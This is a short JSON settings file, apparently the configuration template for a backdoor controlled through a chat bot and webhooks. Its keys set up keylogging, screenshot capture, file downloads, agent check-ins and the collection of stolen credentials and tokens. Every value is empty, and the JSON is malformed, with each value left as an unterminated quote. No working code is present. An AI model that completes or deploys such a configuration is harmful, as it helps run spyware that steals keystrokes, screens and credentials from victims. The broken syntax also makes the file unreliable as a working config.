{
    "settings":{
        "backdoor-name": ",
        "bot-token": ",
        "token-webhook": ",
        "keylogger-webhook": ",
        "screenshots-id": ",
        "downloads-id": ",
        "agent-online-id": ",
        "credentials-id": ",
        "auto-keylogger": "
    }
}